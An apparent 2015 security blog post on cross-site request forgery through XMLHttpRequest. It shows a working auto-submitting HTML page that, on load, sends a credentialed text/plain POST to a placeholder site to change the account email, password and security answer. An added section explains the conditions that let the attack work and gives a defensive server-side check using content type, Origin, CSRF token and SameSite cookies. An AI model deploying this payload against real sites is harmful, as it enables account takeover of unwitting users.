
Showing posts from October, 2015

CSRF in XHR!!!

The code below can be used to perform CSRF using XHR.

```html
<html>
<head>
<script>
function loadXMLDoc() {
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", "https://example.com", true);
  // Attach the browser's stored cookies for the target to the cross-origin request
  xmlhttp.withCredentials = true;
  // No Content-Type header is set, so the string body is sent as text/plain
  xmlhttp.send("{\"emailAddress\":\"abcd.92@gmail.com\",\"password\":\"dqazxsw123\",\"securityQuestion\":\"In what city or town was your first job?\",\"securityAnswer\":\"Bangalore\",\"notifyUpdates\":\"true\"}"); // Data
  window.close();
}
</script>
</head>
<body onload="javascript:loadXMLDoc()">
Action Performed
</body>
</html>
```
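The request above reaches a JSON endpoint only if the server accepts a `text/plain` body, ignores the `Origin` header, and relies on cookies alone. The following server-side gate is an added example, not part of the original post; the function names, the `x-csrf-token` header, and the sample origins and token are assumptions made for illustration.

```javascript
// Added example: hypothetical CSRF gate for a JSON API (Node-style request shape).
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Compare strings without stopping at the first mismatching character.
function constantTimeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string") return false;
  let diff = a.length ^ b.length;
  for (let i = 0; i < a.length; i++) {
    diff |= a.charCodeAt(i) ^ (b.charCodeAt(i) || 0);
  }
  return diff === 0;
}

// req: { method, headers (lower-cased keys), sessionToken (from the server session) }
function checkStateChangingRequest(req, allowedOrigins) {
  const deny = (reason) => ({ allowed: false, reason });
  if (SAFE_METHODS.has(req.method.toUpperCase())) return { allowed: true, reason: "safe-method" };
  const h = req.headers;
  // 1. An XHR string body with no explicit header goes out as text/plain,
  //    which needs no CORS preflight. Insist on the real JSON media type.
  const mediaType = (h["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (mediaType !== "application/json") return deny("content-type");
  // 2. Require an Origin header that matches one of the application's own origins.
  if (!allowedOrigins.includes(h["origin"])) return deny("origin");
  // 3. Require a per-session token that a page on another origin cannot read.
  if (!req.sessionToken || !constantTimeEqual(h["x-csrf-token"], req.sessionToken)) {
    return deny("csrf-token");
  }
  return { allowed: true, reason: "ok" };
}

// Constructed sample requests (not captured traffic).
const ALLOWED_ORIGINS = ["https://app.example.com"];
const crossSiteXhr = {
  method: "POST",
  headers: { "content-type": "text/plain;charset=UTF-8", origin: "https://other.example", cookie: "sid=abc" },
  sessionToken: "t0k3n-constructed",
};
const sameSiteCall = {
  method: "POST",
  headers: { "content-type": "application/json", origin: "https://app.example.com",
             cookie: "sid=abc", "x-csrf-token": "t0k3n-constructed" },
  sessionToken: "t0k3n-constructed",
};
console.log(checkStateChangingRequest(crossSiteXhr, ALLOWED_ORIGINS));
console.log(checkStateChangingRequest(sameSiteCall, ALLOWED_ORIGINS));
```

Setting `SameSite=Lax` or `SameSite=Strict` on the session cookie complements these checks by keeping the browser from attaching the cookie to cross-site POSTs in the first place.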